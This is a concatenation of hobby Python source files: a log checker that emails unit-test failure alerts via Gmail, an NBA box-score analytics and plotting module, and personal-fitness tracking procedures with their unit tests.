# inputOutputFileName = fileNameWithoutExtension.split('-SignatureBackward')[0]
# else:
# inputOutputFileName = fileNameWithoutExtension
# inputOutputFileName += '-ResultProcessor.txt'
# inputFile = open(inputSourceFileName)
# outputFile = open(inputOutputFileName, 'w+')
# rawResultString = ''
# isFindUrlInformation = False
# for line in inputFile:
# if 'UNCOVERED Unique set :' in line:
# break
# if '--url information--' in line:
# isFindUrlInformation = True
# continue
# if isFindUrlInformation:
# rawResultString += line + '\n'
# urlPattern = r'URL\[[0-9]+\]\s:\s\w+\s(.*)'
# matchArray = re.findall(urlPattern, rawResultString)
# matchSet = set(matchArray)
# wrongSet = set()
# index = 0
# for url in matchSet:
# if not 'http' in url:
# wrongSet.add(url)
# else:
# outputFile.write('[' + str(index) + ']: ' + url + '\n\n')
# index += 1
# outputFile.write('\n\nvalid API count: ' + str(index))
# outputFile.write('\n\nwrong API count: ' + str(len(wrongSet)))
# outputFile.write('\n\nwrong API set: \n\n')
# for i, url in enumerate(wrongSet):
# outputFile.write('[' + str(i) + ']: ' + url + '\n\n')
# outputFile.write('\n\n-------------\n\n')
# outputFile.write('raw result: ' + str(len(matchArray)) + '\n')
# for i, url in enumerate(matchArray):
# outputFile.write('[' + str(i) + ']: ' + url + '\n\n')
def main(argv):
inputSourcePath = ''
inputOutputPath = ''
try:
opts, args = getopt.getopt(argv, "hs:o:", ["help", "source=", "output="])
except getopt.GetoptError:
gotError('got error when parsing args')
for opt, arg in opts:
if opt in ('-h', '--help'):
usage()
sys.exit()
elif opt in ('-s', '--source'):
inputSourcePath = arg
elif opt in ('-o', '--output'):
inputOutputPath = arg
oldToNew(inputSourcePath, inputOutputPath)
if len(sys.argv) == 1:
usage()
sys.exit(1)
if __name__ == "__main__":
main(sys.argv[1:])
``` |
{
"source": "JI511/Automated_Tasks",
"score": 3
} |
#### File: JI511/Automated_Tasks/check_log_file.py
```python
import sys
import os
import argparse
import smtplib
from email.message import EmailMessage
def main(log_path, pass_path):
my_log_path = str(log_path)
my_pass_path = str(pass_path)
if os.path.exists(my_log_path) and my_log_path.endswith('.txt') and \
os.path.exists(my_pass_path) and my_pass_path.endswith('.txt'):
try:
p_file = open(my_pass_path, 'r')
gmail_pass = p_file.read()
p_file.close()
file = open(my_log_path, 'r')
for line in file.readlines():
if 'ERROR' in line or 'FAIL' in line:
gmail_sender = '<EMAIL>'
recipient = '<EMAIL>'
subject = 'Personal_Fitness Repo Test Failure'
msg_body = 'Unit test failure!'
body = '\r\n'.join(['To: %s' % recipient,
'From: %s' % gmail_sender,
'Subject: %s' % subject,
'', msg_body])
server = smtplib.SMTP(host='smtp.gmail.com', port=587)
server.ehlo()
server.starttls()
server.login('<EMAIL>', gmail_pass)
try:
print("Attempting to send email...")
server.sendmail(gmail_sender, [recipient], body)
except:
print("There was an error")
server.quit()
sys.exit(1)
file.close()
sys.exit(0)
except Exception:
raise
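# Illustrative alternative, not used by this script: the imported-but-unused
# EmailMessage class can build the same mail without hand-joining the headers.
def send_failure_mail(sender, recipient, password, body):
    msg = EmailMessage()
    msg['From'] = sender
    msg['To'] = recipient
    msg['Subject'] = 'Personal_Fitness Repo Test Failure'
    msg.set_content(body)
    with smtplib.SMTP(host='smtp.gmail.com', port=587) as server:
        server.ehlo()
        server.starttls()
        server.login(sender, password)
        server.send_message(msg)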
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("log_path", help='The desired log file to check for unit test results.')
parser.add_argument("pass_path", help='Path to a config.txt file that stores password for gmail.')
args = parser.parse_args()
main(args.log_path, args.pass_path)
``` |
{
"source": "JI511/NBA_Beatiful_Data",
"score": 3
} |
#### File: NBA_Beatiful_Data/src/analytics_API.py
```python
import datetime
import os
import io
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.dates as plt_dates
from collections import OrderedDict
# third party imports
from basketball_reference_web_scraper import client
# relative imports
from .constants import Vars
from .team_box_score import TeamBoxScore
def get_player_box_score(name, logger, date_obj=None, timeout=3):
"""
Gets the box score for the desired player.
:param str name: Name of the player to search for.
:param logger: Logging object.
:param datetime.datetime date_obj: Datetime object for starting day to search.
:param int timeout: Number of days to search before giving up.
:return: Box score for the player if found.
:rtype: dict
"""
name = name.lower()
if date_obj is None:
date_obj = datetime.datetime.today()
bs = None
while True:
if timeout > 0:
logger.info('Attempting date: %s' % date_obj.strftime('%y-%m-%d'))
found = False
box_scores = client.player_box_scores(day=date_obj.day, month=date_obj.month, year=date_obj.year)
for box_score in box_scores:
if name in box_score['name'].lower():
bs = box_score
found = True
break
if found:
break
date_obj -= datetime.timedelta(days=1)
timeout -= 1
else:
logger.info("Timeout reached.")
break
return bs, date_obj
def get_team_box_score(team, date_obj=None, timeout=3):
"""
Gets the team box score data for a specific day.
:param str team: The team to search for.
:param datetime.datetime date_obj: Datetime object for starting day to search.
:param int timeout: Number of days to search before giving up.
:return:
"""
if date_obj is None:
date_obj = datetime.datetime.today()
team_bs = None
while True:
if timeout > 0:
team_bs = client.team_box_scores(day=date_obj.day, month=date_obj.month, year=date_obj.year)
# todo
date_obj -= datetime.timedelta(days=1)
timeout -= 1
else:
break
return team_bs
def get_daily_box_scores(date_obj=None, timeout=1):
"""
Gets all player box scores for a specific day. The default for this is only the one date specified.
:param datetime.datetime date_obj: Datetime object for starting day to search.
:param int timeout: Number of days to search before giving up.
:return: All box scores sorted by team.
:rtype: OrderedDict
"""
team_dict = OrderedDict()
if date_obj is None:
date_obj = datetime.datetime.today()
while True:
if timeout > 0:
teams = get_teams_played_on_date(date_obj=date_obj)
if len(teams) > 0:
all_box_scores = client.player_box_scores(day=date_obj.day, month=date_obj.month, year=date_obj.year)
for team in teams:
team_dict[team] = []
for player in all_box_scores:
team_dict[player['team'].name].append(player)
break
date_obj -= datetime.timedelta(days=1)
timeout -= 1
else:
break
return team_dict, date_obj
def get_teams_played_on_date(date_obj=None, timeout=1):
"""
Gets a list of all teams that played on the provided date.
:param datetime.datetime date_obj: Datetime object for starting day to search.
:param int timeout: Number of days to search before giving up.
:return: The active teams on the given date.
:rtype: list
"""
teams = []
if date_obj is None:
date_obj = datetime.datetime.today()
while True:
if timeout > 0:
team_box_scores = client.team_box_scores(day=date_obj.day, month=date_obj.month, year=date_obj.year)
if len(team_box_scores) > 1:
teams = [entry['team'].name for entry in team_box_scores]
break
date_obj -= datetime.timedelta(days=1)
timeout -= 1
else:
break
return teams
def convert_to_minutes(seconds_played):
"""
Converts seconds into minutes.
:param seconds_played:
:return: Minutes played
:rtype: float
"""
minutes = seconds_played / 60.0
return round(minutes, 2)
def get_true_shooting(points, fga, tpfga, fta):
"""
Calculates true shooting percentage.
:param int points: Points
:param int fga: Field goals attempted
:param int tpfga: Three point field goals attempted
:param int fta: Free throws attempted
:return: True shooting percentage
:rtype: float
"""
try:
ts = points / (2.0 * ((fga + tpfga) + 0.44 * fta))
except ZeroDivisionError:
ts = 0
return round(ts, 3)
def get_assist_turnover_ratio(assists, turnovers):
"""
Calculates the ratio of assists to turnovers.
:param assists: Number of assists.
:param turnovers: Number of turnovers.
:return: The ratio
:rtype: float
"""
try:
ratio = float(assists) / turnovers
except ZeroDivisionError:
ratio = float(assists)
return round(ratio, 2)
def check_supported_stats(stats):
"""
Checks a list of strings to determine if the stat type is supported.
:param stats: The stats to check.
:return: Indicates if all provided stats are acceptable.
:rtype: bool
"""
valid = True
for stat in stats:
if stat not in Vars.supported_stats:
valid = False
break
return valid
def convert_team_name(team):
"""
Converts team string into proper casing format
:param str team: Team enum name
:return: Converted string
"""
return team.title().replace('_', ' ')
# ----------------------------------------------------------------------------------------------------------------------
# Pandas interactions
# ----------------------------------------------------------------------------------------------------------------------
def get_existing_data_frame(csv_path, logger):
"""
Determines if a data frame already exists, and returns the data frame if true. Returns None if does not exist.
:param str csv_path: Path of the csv file.
:param logger: Instance of logger object.
:return: Data frame if exists, None otherwise
:rtype: pd.DataFrame
"""
df = None
if os.path.exists(csv_path):
logger.info("Existing data frame found.")
df = pd.read_csv(csv_path, index_col=0)
return df
def gather_new_on_date(date, csv, logger):
"""
Gathers new player box score data from a specific date and updates the given csv if provided.
:param datetime.datetime date: The date to search on
:param str csv: The path to the csv
:param logger: Logging object
:return: The pandas.DataFrame object
"""
team_box_scores = []
df = get_existing_data_frame(csv, logger=logger)
daily_box_scores, found_date = get_daily_box_scores(date_obj=date)
for team in daily_box_scores.keys():
team_box_scores.append(TeamBoxScore(box_scores=daily_box_scores[team],
team_box_score=[],
team_name=team,
date=found_date))
new_df = create_data_frame_from_team_box_scores(team_box_scores=team_box_scores, logger=logger)
if df is None:
logger.info('There was not an existing data frame.')
df = new_df
else:
logger.info('Appending new data frame of shape: %s' % (new_df.shape,))
temp_df = df.append(new_df, sort=False)
temp_size = temp_df.shape[0]
# add new columns with ops from existing data
temp_df['minutes_played'] = temp_df['seconds_played'].apply(convert_to_minutes)
temp_df['true_shooting'] = temp_df.apply(
lambda x: get_true_shooting(x['points'],
x['attempted_field_goals'],
x['attempted_three_point_field_goals'],
x['attempted_free_throws']),
axis=1)
temp_df['assist_turnover_ratio'] = temp_df.apply(
lambda x: get_assist_turnover_ratio(x['assists'],
x['turnovers']),
axis=1)
temp_df.drop_duplicates(inplace=True)
temp_size = temp_size - temp_df.shape[0]
logger.info('Dropped %s duplicates' % temp_size)
df = temp_df
logger.info('Shape of DataFrame object: %s' % (df.shape,))
df.to_csv(csv)
return df
def create_data_frame_from_team_box_scores(team_box_scores, logger):
"""
Creates a pandas data frame object from a list of team box score objects.
:param list team_box_scores: Team box score objects
:param logger: Instance of logger object
:return: Pandas data frame
:rtype: pd.DataFrame
"""
logger.info(" Appending new data frame from %s teams" % len(team_box_scores))
data = {}
index = []
for stat in Vars.supported_stats:
data[stat] = []
for tbs in team_box_scores:
index.extend(tbs.get_players())
data['points'].extend(tbs.get_points())
data['rebounds'].extend(tbs.get_rebounds())
data['assists'].extend(tbs.get_assists())
data['made_field_goals'].extend(tbs.get_made_field_goals())
data['made_three_point_field_goals'].extend(tbs.get_made_three_point_field_goals())
data['made_free_throws'].extend(tbs.get_made_free_throws())
data['offensive_rebounds'].extend(tbs.get_offensive_rebounds())
data['defensive_rebounds'].extend(tbs.get_defensive_rebounds())
data['team'].extend(tbs.get_teams())
data['location'].extend(tbs.get_locations())
data['opponent'].extend(tbs.get_opponents())
data['outcome'].extend(tbs.get_outcomes())
data['seconds_played'].extend(tbs.get_seconds_played())
data['attempted_three_point_field_goals'].extend(tbs.get_attempted_three_point_field_goals())
data['attempted_free_throws'].extend(tbs.get_attempted_free_throws())
data['attempted_field_goals'].extend(tbs.get_attempted_field_goals())
data['steals'].extend(tbs.get_steals())
data['blocks'].extend(tbs.get_blocks())
data['turnovers'].extend(tbs.get_turnovers())
data['personal_fouls'].extend(tbs.get_personal_fouls())
data['game_score'].extend(tbs.get_game_scores())
data['date'].extend(tbs.get_dates())
if data['team']:
teams = list(set(data['team']))
for team in teams:
logger.info(' %s' % team)
df = pd.DataFrame(data, index=index)
return df
def get_team_date_df(df, team, date):
"""
Attempts to make a pandas data frame of all player box scores on a certain day.
:param pandas.DataFrame df: The data frame to search.
:param str team: The team to search for.
:param datetime.datetime date: The date to search on.
:return: Team data frame if found
"""
team_df = None
if isinstance(date, datetime.datetime):
converted_date = date.strftime('%y_%m_%d')
team_df = df[(df['date'] == converted_date) & (df['team'] == team)]
return team_df
def filter_df_on_team_names(df, teams):
"""
Returns a new data frame object only containing rows where the team matches any of the provided team names.
:param pandas.DataFrame df: The data frame to search.
:param list teams: The teams to filter on.
:return: Team filtered data frame, or the original if none of the specified teams are found.
"""
teams = [entry.upper().replace(' ', '_') for entry in teams]
team_df = df[df['team'].isin(teams)]
return team_df
def get_most_recent_update_date(df, date_col='date'):
"""
Gets the most recent date from the pandas.DataFrame provided.
:param pandas.DataFrame df: The pandas.DataFrame object
:param str date_col: The column to reference in the DataFrame object
:return: The date found
:rtype: datetime.datetime
"""
temp_series = pd.to_datetime(df[date_col], format='%y_%m_%d')
temp_date = str(temp_series.max()).split()[0].split('-')
return datetime.datetime(year=int(temp_date[0]), month=int(temp_date[1]), day=int(temp_date[2]))
def get_team_result_on_date(team, date, df):
"""
Calculates the team scores on a particular date.
:param str team: Team to search for
:param datetime.datetime date: The date to search on
:param pandas.DataFrame df: The data set to search in
:return: The score as a string, ex: 97-88. The desired team's score will always be first.
"""
converted_team = team.replace(' ', '_').upper()
converted_date = date.strftime('%y_%m_%d')
team_df = df[(df['team'] == converted_team) & (df['date'] == converted_date) & (df['points'] > 0)]
opp_team = team_df['opponent'].values[0]
opp_df = df[(df['team'] == opp_team) & (df['date'] == converted_date) & (df['points'] > 0)]
res = '%s-%s' % (int(np.sum(team_df['points'])), int(np.sum(opp_df['points'])))
return res
def create_scatter_plot_with_trend_line(x_key, y_key, df, **kwargs):
"""
Creates a scatter plot for two different series of a pandas data frame.
:param str x_key: The column name in the data frame to use for the x axis.
:param str y_key: The column name in the data frame to use for the y axis.
:param pandas.DataFrame df: The data frame object.
Supported kwargs:
bool grid: Indicates if a grid should be added to the plot.
int num_outliers: The number of outliers to label on the plot.
list teams: The team names to filter on if wanted.
int min_seconds: The minimum number of seconds played to filter on if needed.
int max_seconds: The maximum number of seconds played to filter on if needed.
str save_path: The path to save the png file created.
bool show_plot: Indicates if the png should be shown during execution.
bool trend_line: Indicates if a trend line should be shown.
:return: The save path of the created png, the outlier DataFrame, the filtered DataFrame.
:rtype: tuple
"""
teams = kwargs.get('teams', None)
save_path = kwargs.get('save_path', None)
show_plot = kwargs.get('show_plot', False)
min_seconds = kwargs.get('min_seconds', 0)
max_seconds = kwargs.get('max_seconds', 6000)
num_outliers = kwargs.get('num_outliers', 5)
grid = kwargs.get('grid', True)
trend_line = kwargs.get('trend_line', True)
if num_outliers > 15:
num_outliers = 15
# filters
if teams is not None and isinstance(teams, list):
df = filter_df_on_team_names(df, teams)
if min_seconds is not None and isinstance(min_seconds, int):
if min_seconds >= 60:
df = df[df['seconds_played'] >= min_seconds]
else:
df = df[df['minutes_played'] >= min_seconds]
if max_seconds is not None and isinstance(max_seconds, int):
if max_seconds >= 60:
df = df[df['seconds_played'] <= max_seconds]
else:
df = df[df['minutes_played'] <= max_seconds]
temp_df = df[[x_key, y_key]]
# find outliers
series_size = temp_df[y_key].shape[0]
if series_size > num_outliers:
thresh = sorted(temp_df[y_key].to_list())[-num_outliers]
else:
thresh = 0
outlier_df_full = df[df[y_key] >= thresh]
main_df = temp_df[temp_df[y_key] < thresh]
title = '%s vs %s (%s samples)' % (x_key.title().replace('_', ' '),
y_key.title().replace('_', ' '),
series_size)
outlier_df = temp_df[temp_df[y_key] >= thresh]
# plot main df and outliers
fig, ax = plt.subplots(figsize=(10, 6))
main_df.plot(kind='scatter', x=x_key, y=y_key, grid=grid, ax=ax)
outlier_df.plot(kind='scatter', x=x_key, y=y_key, grid=grid, ax=ax)
ax.set_xlabel(x_key.title().replace('_', ' '))
ax.set_ylabel(y_key.title().replace('_', ' '))
# add point labels
for k, v in outlier_df.iterrows():
temp_split = k.split(' ')
name = '%s.%s.' % (temp_split[0][:1], temp_split[1][:3])
ax.annotate(name, v, xytext=(5, -5), textcoords='offset points')
# create trend line
if trend_line:
x = df[x_key]
y = df[y_key]
z = np.polyfit(x, y, 1)
p = np.poly1d(z)
plt.plot(x, p(x), "r--", label='Trend')
plt.legend(loc='lower right')
# makes things fit on graph window
plt.title(title)
plt.tight_layout()
# handle output
plot_path = None
if save_path is not None:
if os.path.isdir(save_path):
if not os.path.exists(os.path.join(save_path, 'plots')):
os.mkdir(os.path.join(save_path, 'plots'))
ymd = datetime.datetime.now().strftime("%y%m%d")
plot_path = os.path.join(save_path, 'plots', '%s_VS_%s_%s' % (x_key, y_key, ymd))
plt.savefig(plot_path)
else:
if save_path == 'svg_buffer':
fig_file = io.StringIO()
plt.savefig(fig_file, format='svg', bbox_inches='tight')
fig_data_svg = '<svg' + fig_file.getvalue().split('<svg')[1]
fig_file.close()
plot_path = fig_data_svg
else:
# save at the path given
plt.savefig(save_path)
plot_path = save_path
plt.clf()
plt.cla()
plt.close('all')
if show_plot:
plt.show()
return plot_path, outlier_df_full, df
def create_date_plot(y_key, player, df, **kwargs):
"""
Creates a plot of player data based on a given key.
:param y_key: The stat to filter on
:param str player: The name of the player to search for
:param pandas.DataFrame df: The pandas.DataFrame object to search in
Supported kwargs:
save_path: The path to save the plot to or the type of plot to save
show_plot: Determines if the plot should be shown to the user
min_seconds: The minimum seconds to filter on
max_seconds: The maximum seconds to filter on
num_outliers: The number of outlier data points to collect
grid: Determines if both x and y axis grids should be used, or just one or the other
mean_line: Determines if a mean line should be shown of all collected data points
:return: The path of the created plot, outlier pandas.DataFrame object, full pandas.DataFrame object.
:rtype: tuple
"""
save_path = kwargs.get('save_path', None)
show_plot = kwargs.get('show_plot', False)
min_seconds = kwargs.get('min_seconds', 0)
max_seconds = kwargs.get('max_seconds', 6000)
num_outliers = kwargs.get('num_outliers', 5) # todo
grid = kwargs.get('grid', 'both')
mean_line = kwargs.get('mean_line', True)
plot_path = None
outlier_df = None
# filters
perform_plot = True
if player is not None and isinstance(player, str):
if np.any(df.index.isin([player])):
df = df[df.index.isin([player])]
else:
# we don't want to try if the player name is invalid
perform_plot = False
plot_path = 'Invalid player name of %s' % player
if isinstance(min_seconds, int) and isinstance(max_seconds, int):
if max_seconds > min_seconds:
if min_seconds >= 60:
df = df[df['seconds_played'] >= min_seconds]
else:
df = df[df['minutes_played'] >= min_seconds]
if max_seconds >= 60:
df = df[df['seconds_played'] <= max_seconds]
else:
df = df[df['minutes_played'] <= max_seconds]
else:
plot_path = 'Max seconds < Min seconds'
perform_plot = False
else:
plot_path = 'Max/Min seconds incorrect type %s %s' % (type(min_seconds), type(max_seconds))
perform_plot = False
if perform_plot and df.shape[0] > 0:
outlier_df = df.sort_values(by=[y_key], ascending=False)
outlier_df = outlier_df.head(n=num_outliers)
df['datetime'] = pd.to_datetime(df['date'], format='%y_%m_%d')
x_key = 'datetime'
temp_df = df[[x_key, y_key]]
series_size = temp_df[y_key].shape[0]
title = '%s: %s (%s samples)' % (player,
y_key.title().replace('_', ' '),
series_size)
data_mean = np.mean(temp_df[y_key])
fig, ax = plt.subplots(figsize=(10, 6))
temp_df.plot(kind='line', x=x_key, y=y_key, style='.', ms=10, ax=ax)
if mean_line:
plt.axhline(y=data_mean, label='Mean: %s' % np.round(data_mean, 1), color='red')
plt.legend(loc='best')
ax.set_xlabel('Date (month-day)')
ax.set_ylabel(y_key.title().replace('_', ' '))
ax.set_xlim([ax.get_xlim()[0] - 2, ax.get_xlim()[1] + 2])
# calc x tick dates
start, end = ax.get_xlim()[0], ax.get_xlim()[1]
if (end - start) > 0:
ticks_needed = (end - start) / 4
x_ticks = [end]
for i in range(int(ticks_needed)):
temp_tick = start + (i * 4)
x_ticks.append(temp_tick)
ax.set_xticks(x_ticks)
date_format = plt_dates.DateFormatter('%m-%d')
ax.xaxis.set_major_formatter(date_format)
# calc y tick dates
top = ax.get_ylim()[1]
if top >= 30:
y_ticks = [0]
temp_tick = 5
while temp_tick < top:
y_ticks.append(temp_tick)
temp_tick += 5
ax.set_yticks(y_ticks)
if grid != 'none':
if grid == 'x':
ax.grid(axis='x')
elif grid == 'y':
ax.grid(axis='y')
else:
ax.grid()
plt.title(title)
plt.tight_layout()
# handle output
if save_path is not None:
if os.path.isdir(save_path):
if not os.path.exists(os.path.join(save_path, 'plots')):
os.mkdir(os.path.join(save_path, 'plots'))
ymd = datetime.datetime.now().strftime("%y%m%d")
plot_path = os.path.join(save_path, 'plots', '%s_VS_%s_%s' % (x_key, y_key, ymd))
plt.savefig(plot_path)
else:
if save_path == 'svg_buffer':
fig_file = io.StringIO()
plt.savefig(fig_file, format='svg', bbox_inches='tight')
fig_data_svg = '<svg' + fig_file.getvalue().split('<svg')[1]
fig_file.close()
plot_path = fig_data_svg
else:
# save at the path given
plt.savefig(save_path)
plot_path = save_path
plt.clf()
plt.cla()
plt.close('all')
if show_plot:
plt.show()
return plot_path, outlier_df, df
def create_bar_plot(df, bar_items, save_path=None, show_plot=False, team=None, date=None):
"""
Creates a stacked bar graph with any number of column names for a team.
:param pandas.DataFrame df: Data frame to use.
:param list bar_items: Column names within the data frame.
:param str save_path: The path to save the png file created.
:param bool show_plot: Indicates if the png should be shown during execution.
:param str team: Optional team name to add to plot title.
:param datetime.datetime date: Optional date to add to plot title.
:return: Save path if save successful.
"""
fig, ax = plt.subplots(figsize=(10, 8))
margin_bottom = np.zeros(df.shape[0])
colors = ['#17408B', '#C9082A', '#552084', '#FDBA21']
title = ''
for index, item in enumerate(bar_items):
values = df[item].to_list()
df.plot.bar(y=item, ax=ax, stacked=True, bottom=margin_bottom, color=colors[index], rot=45, label=item)
margin_bottom += values
title += '%s ' % item.title()
if team is not None:
if isinstance(team, str):
title = '%s %s' % (convert_team_name(team), title)
if date is not None:
if isinstance(date, datetime.datetime):
title = '%s %s' % (title, date.strftime('%y_%m_%d'))
ax.set_title(title)
plt.tight_layout()
# handle output
plot_path = None
if save_path is not None:
if os.path.isdir(save_path):
if not os.path.exists(os.path.join(save_path, 'plots')):
os.mkdir(os.path.join(save_path, 'plots'))
if date is None:
ymd = datetime.datetime.now().strftime("%y%m%d")
plot_path = os.path.join(save_path, 'plots', '%s_%s' % (title.replace(' ', '_'), ymd))
else:
plot_path = os.path.join(save_path, 'plots', title.replace(' ', '_'))
plt.savefig(plot_path)
if show_plot:
plt.show()
return plot_path
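# Illustrative usage sketch, not part of the original module: the pure helper
# functions above can be exercised without any web scraping (run as a module,
# e.g. `python -m src.analytics_API`, since the file uses relative imports).
if __name__ == '__main__':
    # 30 points on 20 field goal attempts (6 of them threes) and 8 free throw attempts
    print(get_true_shooting(points=30, fga=20, tpfga=6, fta=8))   # 0.508
    print(get_assist_turnover_ratio(assists=7, turnovers=2))      # 3.5
    print(convert_to_minutes(seconds_played=2145))                # 35.75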
# ----------------------------------------------------------------------------------------------------------------------
# End
# ----------------------------------------------------------------------------------------------------------------------
``` |
{
"source": "JI511/Personal_Fitness",
"score": 3
} |
#### File: src/Procedures/body_weight.py
```python
import logging
from src.Util.constants import Constants
from src.Util import utilities as util
from src.Procedures.procedure import Procedure
class BodyWeightProcedure(Procedure):
"""
Class for handling body weight procedures and functions.
"""
def __init__(self, output_dir=None):
"""
Setup for body weight procedure.
:param output_dir: Optional output directory if not the default.
"""
super(BodyWeightProcedure, self).__init__(table='body_weight',
output_dir=output_dir,
query=Constants.body_weight_query,
logger=logging.getLogger(__name__),
names=['body_weight'])
self.logger.info("Body weight tracking and calculations")
def get_new_data(self, connection):
"""
Get the input value from the user for body weight procedure.
"""
new_data = []
while True:
self.logger.info('Getting input for new body weight entry.')
weight_text = input("What did you weigh today?\n")
if weight_text != 'q':
try:
new_data.append(int(weight_text))
self.append_new_entry(connection=connection,
values=new_data,
column_names=self.names)
break
except ValueError:
print('Invalid option, please enter a valid number.')
else:
self.logger.info("User backed out before new entry added.")
break
return new_data, self.names
def get_new_data_from_file(self, connection):
"""
Appends multiple entries to the database with values read from a file
:param connection: Connection to the database.
:return: All values added to the database
"""
self.logger.info('Getting multiple values from file')
weight_text = input("What file would you like to use?\n")
values = util.read_file_values(file_path=weight_text,
logger=self.logger)
if values is not None:
for value in values:
self.append_new_entry(connection=connection,
values=[value],
column_names=self.names)
else:
self.logger.error("Bad path provided, aborting updates")
return values
# ----------------------------------------------------------------------------------------------------------------------
# End
# ----------------------------------------------------------------------------------------------------------------------
```
#### File: src/Procedures/weight_lifting.py
```python
import logging
from src.Util.constants import Constants
from src.Util import constants as const
from src.Procedures.procedure import Procedure
class WeightLiftingProcedure(Procedure):
"""
Class for handling weight lifting procedures and functions.
"""
def __init__(self, output_dir=None):
"""
Setup for weight lifting procedure.
:param output_dir: Optional output directory if not the default.
"""
super(WeightLiftingProcedure, self).__init__(table='weight_lifting',
output_dir=output_dir,
query=Constants.weight_lifting_compound_query,
logger=logging.getLogger(__name__),
names=None)
self.logger.info("Weight lifting tracking and calculations.")
def get_new_data(self, connection):
"""
Adds a new entry into the weight lifting table within the health_database database.
:param connection: Connection to the database.
"""
self.logger.info('Getting input for new weight lifting entry.')
names = self.get_workout_item_names(
group=self.determine_muscle_group('Which muscle groups did you work today?'))
# check if names is empty
values = []
if names:
while True:
use_default = input("Would you like to use default values based on current max?\n"
"y: yes\n"
"n: no\n")
if use_default == 'y':
self.append_new_entry(connection=connection,
values=self.get_default_lift_values(names=names),
column_names=names)
values = self.get_default_lift_values(names=names)
break
elif use_default == 'n':
return NotImplementedError
print('Please enter a valid option')
return values, names
def get_new_data_from_file(self, connection):
"""
Appends multiple entries to the database with values read from a file
:param connection: Connection to the database.
:return: All values added to the database
"""
return NotImplementedError
def get_max_lift_updates(self):
"""
Updates the user selected max lift values by getting input from the user.
"""
names = self.determine_muscle_group(question_text='Which max values would you like to update?')
max_lift_names = list()
if 'bench_press' in names:
max_lift_names.append('bench_press_max')
if 'squat' in names:
max_lift_names.append('squat_max')
if 'shoulder_press' in names:
max_lift_names.append('shoulder_press_max')
if 'deadlift' in names:
max_lift_names.append('deadlift_max')
max_lift_values = []
for row in max_lift_names:
while True:
max_text = input(("New " + row + "value:\n").replace("_", " "))
try:
max_update = int(max_text)
max_lift_values.append(max_update)
break
except ValueError:
print('Invalid literal, please enter a number.')
return max_lift_values, max_lift_names
@staticmethod
def get_default_lift_values(names):
"""
Get the current program lifting values for the day. This is to speed up input if the user is following
a program.
:param names:
:return: The default values
"""
values = []
for i in range(len(names)):
values.append(i)
return values
@staticmethod
def get_workout_item_names(group):
"""
Gets the column names for the specified workout group.
:param List group: The user chosen compound lifts.
:return: A list of Strings containing the column names to update.
"""
names = [a[0] for a in const.generate_sets_item_query(names=group,
sets=6)]
return names
@staticmethod
def determine_muscle_group(question_text=''):
"""
Gets a binary input from the user to select the chosen compound lifts to update.
:param str question_text: Question for the user to determine which procedure is asking about compounds.
:return: A list of Strings containing the chosen compound lifts.
"""
muscle_groups = list()
while True:
groups = input(question_text + " (Binary Entry)\n"
"8: Bench\n"
"4: Squat\n"
"2: Shoulder Press\n"
"1: Deadlift\n"
"q: Quit\n")
if groups != 'q':
try:
result = int(groups)
if result > 0:
break
else:
print('Please enter a positive integer value.')
except ValueError:
print('Invalid literal, please enter a number.')
else:
result = 0
break
if (result & Vars.Bench) == 8:
muscle_groups.append("bench_press")
if (result & Vars.Squat) == 4:
muscle_groups.append("squat")
if (result & Vars.Shoulder_Press) == 2:
muscle_groups.append("shoulder_press")
if (result & Vars.Deadlift) == 1:
muscle_groups.append("deadlift")
return muscle_groups
@staticmethod
def determine_accessories():
"""
Similar to determine_muscle_group(), this gets the user chosen accessory values.
:return: todo
"""
while True:
accessories = input("Would you life to use default accessories?\n"
"y: yes\n"
"n: no\n")
if accessories == 'y':
break
elif accessories == 'n':
break
def view_data(self, connection, column_names=None):
return NotImplementedError
class Vars(object):
"""
Class to store the enum values for compound lifts.
"""
Bench = 8
Squat = 4
Shoulder_Press = 2
Deadlift = 1
# ----------------------------------------------------------------------------------------------------------------------
# End
# ----------------------------------------------------------------------------------------------------------------------
```
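A standalone sketch (an illustration, not code from this repo) of the bitmask decoding that `determine_muscle_group` performs on the single number the user types:
```python
# each set bit selects one compound lift: 8=bench, 4=squat, 2=shoulder press, 1=deadlift
FLAGS = [(8, 'bench_press'), (4, 'squat'), (2, 'shoulder_press'), (1, 'deadlift')]

def decode(selection: int) -> list:
    return [name for bit, name in FLAGS if selection & bit]

print(decode(13))  # 8 + 4 + 1 -> ['bench_press', 'squat', 'deadlift']
print(decode(2))   # ['shoulder_press']
```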
#### File: tests/Procedures/test_body_weight.py
```python
import unittest
import tempfile
import os
import shutil
import datetime
from src.Util import database_api as db_api
from src.Procedures import body_weight
from src.Procedures import procedure
class TestBodyWeightProcedure(unittest.TestCase):
"""
Class for testing the body weight procedure.
"""
def setUp(self):
"""
Initializes unit test variables.
"""
self.logs_dir = tempfile.mkdtemp()
self.connection = db_api.create_connection(db_path=os.path.join(self.logs_dir, 'test_database.db'))
self.procedure = body_weight.BodyWeightProcedure(output_dir=self.logs_dir)
self.input_values = []
def mock_input(_):
"""
Fake input function in order to test input calls in unit tests.
"""
return self.input_values.pop(0)
body_weight.input = mock_input
procedure.input = mock_input
db_api.create_table(connection=self.connection,
table=self.procedure.table,
query=self.procedure.query)
for _ in range(5):
unique_id = db_api.add_new_row(connection=self.connection,
table=self.procedure.table)
db_api.update_item(connection=self.connection,
table=self.procedure.table,
value_tuple=(100, unique_id),
column_names=['body_weight'])
def tearDown(self):
"""
Performs any clean up needed.
"""
self.connection = None
if os.path.exists(self.logs_dir):
shutil.rmtree(self.logs_dir)
# ------------------------------------------------------------------------------------------------------------------
# get_new_data tests
# ------------------------------------------------------------------------------------------------------------------
def test_get_new_data_nominal(self):
"""
Provides mock user input for a body weight entry.
"""
self.input_values = ['100']
result, name = self.procedure.get_new_data(connection=self.connection)
self.assertEqual(result, [100])
self.assertEqual(name, ['body_weight'])
def test_get_new_data_bad_input(self):
"""
The first input value shall be rejected and the second accepted.
:return:
"""
self.input_values = ['a', '100']
result, name = self.procedure.get_new_data(connection=self.connection)
self.assertEqual(result, [100])
def test_get_new_data_quit(self):
"""
The user needs to be able to exit the input prompt screen why a 'q' is provided.
"""
self.input_values = ['q']
result, name = self.procedure.get_new_data(connection=self.connection)
self.assertEqual(result, [])
# ------------------------------------------------------------------------------------------------------------------
# get_new_data_from_file tests
# ------------------------------------------------------------------------------------------------------------------
def test_get_new_data_from_file_nominal(self):
"""
Adds multiple values to database via text file.
"""
path = os.path.join(os.getcwd(), r'tests\support_files\body_weight_inputs.txt')
